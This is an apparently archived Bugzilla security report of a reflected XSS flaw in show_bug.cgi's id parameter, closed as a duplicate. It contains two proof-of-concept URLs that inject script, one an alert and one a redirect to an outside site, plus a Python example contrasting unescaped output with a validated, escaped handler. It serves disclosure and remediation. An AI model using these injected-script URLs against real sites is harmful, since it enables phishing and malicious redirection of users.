Closed Bug 842096 Opened 11 years ago Closed 11 years ago

Reflected XSS in Bugzilla

Categories

(Bugzilla :: Creating/Changing Bugs, defect)

2.10
defect
Not set
normal

RESOLVED DUPLICATE of bug 842038

People

(Reporter: breakthesecurity.com, Unassigned)

Details

Attachments

(1 file)

Attached image bugzilla-xss.jpg
User Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Build ID: 20130201065344

Steps to reproduce:

Hi, I have identified an XSS vulnerability in the Bugzilla website. I have tried to inject the XSS code in the bug id:

POC 1:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>alert('E Hacking News')</script>&format=1

POC 2:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>document.location="http://www.ehackingnews.com"</script>&format=1


Actual results:

It successfully executed the injected code. Hackers can use this vulnerability for social engineering attacks including phishing, redirecting to malicious sites and more.

I have attached the screenshot.


Expected results:

It should have sanitized the ID parameter. Escape the special characters from the ID parameter.
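The fix the report asks for, as an added example that is not Bugzilla's own (Perl) code: the reflected-parameter pattern next to a hardened handler that allow-list validates `id` as a positive integer and HTML-escapes anything it echoes back. The query string below is constructed to mirror PoC 1 above.

```python
import html
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed query string mirroring the report's first PoC (not taken from the live site).
SAMPLE_QUERY = 'id=839897"><script>alert(1)</script>&format=1'

# Bugzilla bug ids are positive integers; anything else is rejected rather than reflected.
BUG_ID_RE = re.compile(r"[1-9][0-9]*")


def render_unescaped(bug_id: str) -> str:
    """Vulnerable pattern: the id parameter is copied verbatim into an attribute value."""
    return f'<input name="id" value="{bug_id}">'


def render_escaped(bug_id: str) -> str:
    """Hardened output: quotes and angle brackets become entities before reflection."""
    return f'<input name="id" value="{html.escape(bug_id, quote=True)}">'


def validate_bug_id(raw: str) -> Optional[int]:
    """Allow-list validation: return the integer id, or None when the value is not one."""
    return int(raw) if BUG_ID_RE.fullmatch(raw) else None


def handle(query: str) -> dict:
    """Hypothetical show_bug-style handler: validate first, escape everything echoed back."""
    params = parse_qs(query, keep_blank_values=True)
    raw = params.get("id", [""])[0]
    bug_id = validate_bug_id(raw)
    if bug_id is None:
        # The bad value is reported in the error page, but only in escaped form.
        return {"status": 400, "body": f"<p>Invalid bug id: {html.escape(raw, quote=True)}</p>"}
    return {"status": 200, "body": render_escaped(str(bug_id))}


if __name__ == "__main__":
    raw_id = parse_qs(SAMPLE_QUERY)["id"][0]
    print("vulnerable:", render_unescaped(raw_id))
    print("escaped:   ", render_escaped(raw_id))
    print("handler:   ", handle(SAMPLE_QUERY))
```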
This bug has already been reported earlier today.
Assignee: nobody → create-and-change
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Component: General → Creating/Changing Bugs
Product: bugzilla.mozilla.org → Bugzilla
QA Contact: default-qa
Resolution: --- → DUPLICATE
Version: Production → 2.10
Wow, what are the odds that a bug sits latent for something like 8-10 years (more?) and then gets independently reported by two people 12 hours apart?
Flags: sec-bounty?
Everything started from Nokia bug hunting. A bug in the Nokia site led to this Bugzilla one.
breakthesecurity: can you tell us a bit more about this Nokia bug, and how it led you to find this bug?

Gerv
Bug 842038 has been fixed and is now public. Removing the sec flag.
Group: bugzilla-security
Please remove comment 6, as it leads to bugs in a lot of high-profile sites.
Flags: sec-bounty? → sec-bounty-